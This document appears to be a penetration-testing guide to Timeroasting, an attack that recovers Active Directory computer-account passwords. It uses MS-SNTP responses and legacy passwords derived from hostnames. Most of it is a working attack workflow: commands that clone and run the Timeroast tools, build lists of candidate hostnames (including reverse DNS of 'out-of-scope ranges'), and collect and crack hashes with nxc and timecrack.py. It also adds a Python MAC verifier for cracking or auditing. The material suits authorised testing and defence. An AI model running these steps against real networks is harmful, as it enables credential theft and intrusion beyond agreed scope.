Timeroasting
Some computer accounts can be configured with legacy passwords that are the first 14 characters (lowercase) of their username (minus the $). You can attack this in one of three ways:
Password spraying
Kerberoasting
Timeroasting (preferred)
Timeroasting abuses the Windows NTP authentication extension (MS-SNTP, hash type sntp-ms), which extends the NTP protocol by adding a Message Authentication Code (MAC). The attack requests NTP syncs for a given RID and gets back a MAC that can be cracked offline to recover the machine account password.
If you are not authenticated, you will not know the RIDs, but you can brute force them. You will then need to map the RIDs to hostnames, or you can simply try every hostname candidate against every RID's sntp-ms hash.
Download tooling
git clone https://github.com/SecuraBV/Timeroast.git
cd Timeroast
Get list of Timeroasting password candidates
Authenticated (Preferred)
jq '.data[] | .Properties.samaccountname' *computers.json | tr -d '"$' | tee timeroasting-hostnames.txt
Unauthenticated
Get list of hostnames - Reverse DNS
dnsrecon -r <CIDR_RANGE> | tee reverse-dns_<CIDR_RANGE>.txt # Repeat for each active CIDR (including out-of-scope ranges)
# Create Timeroasting password candidates file
cat *.txt | grep 'PTR' | awk -F' ' '{print $3}' | sort -u | cut -d '.' -f 1 | tr '[:upper:]' '[:lower:]' | sort -u | cut -c1-14 >> timeroasting-hostnames.txt
You will have to do some manual cleanup of the Timeroasting password candidates file, since some PTR records are defaults rather than real hostnames. If you skip this, cracking will be slower but should still be doable.
Collect Timeroasting hashes
Timeroast via RID Brute Force - Netexec (Preferred)
# Using NXC version >= 1.4
nxc smb $ADCONTROLLER -M timeroast --log nxc-timeroast.txt
grep -a 'TIMEROAST' nxc-timeroast.txt | grep -v '[*]' | awk -F' ' '{print $12}' > timeroast.hashes
Timeroast via RID Brute Force - timeroast.py
python3 timeroast.py $ADCONTROLLER -o timeroast.hashes
Crack Timeroasting hashes
wget https://raw.githubusercontent.com/SecuraBV/Timeroast/refs/heads/main/extra-scripts/timecrack.py
python3 timecrack.py timeroast.hashes timeroasting-hostnames.txt
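To see what the cracking step actually verifies (and to audit which computer accounts still carry a legacy hostname-derived password), here is an added Python example that is not part of the Timeroast project: it recomputes the MS-SNTP MAC, MD5 over the account's NT hash followed by the 48-byte NTP reply, and checks a hash line against the legacy candidates. The `RID:$sntp-ms$<mac hex>$<reply hex>` line layout is assumed to match what timeroast.py writes, the function names are mine, and the sample NTP reply is constructed, not captured.

```python
import hashlib
import struct
MASK = 0xFFFFFFFF
K2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
K3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
# Constructed sample: a fake 48-byte NTP reply, not captured from a real DC.
SAMPLE_REPLY = bytes(range(48))

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(msg: bytes) -> bytes:
    # RFC 1320 MD4, inlined because OpenSSL 3 builds of hashlib often refuse "md4".
    bit_len = len(msg) * 8
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:    # round 1 (F), message words in order
                f, k, s, t = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:  # round 2 (G)
                f, k, s, t = (b & c) | (b & d) | (c & d), K2[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:         # round 3 (H)
                f, k, s, t = b ^ c ^ d, K3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, _rotl((a + f + x[k] + t) & MASK, s), b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def sntp_ms_mac(password: str, ntp_reply: bytes) -> bytes:
    # MS-SNTP authenticator: MD5(NT hash of the account password || 48-byte NTP reply).
    return hashlib.md5(md4(password.encode("utf-16le")) + ntp_reply).digest()

def parse_hash_line(line: str):
    # Assumed layout 'RID:$sntp-ms$<mac hex>$<ntp reply hex>' as written by timeroast.py.
    rid, _, rest = line.strip().partition(":")
    mac_hex, reply_hex = rest.split("$")[2:]
    return int(rid), bytes.fromhex(mac_hex), bytes.fromhex(reply_hex)

def legacy_candidate(hostname: str) -> str:
    # Legacy computer password: first 14 chars of the lowercased name without the '$'.
    return hostname.rstrip("$").lower()[:14]

def find_legacy_account(line: str, hostnames):
    # Return the hostname whose legacy password validates the MAC, or None.
    _, mac, reply = parse_hash_line(line)
    for name in hostnames:
        if sntp_ms_mac(legacy_candidate(name), reply) == mac:
            return name
    return None
```

Any account this finds is one whose password has never been rotated from the join-time default and should be reset.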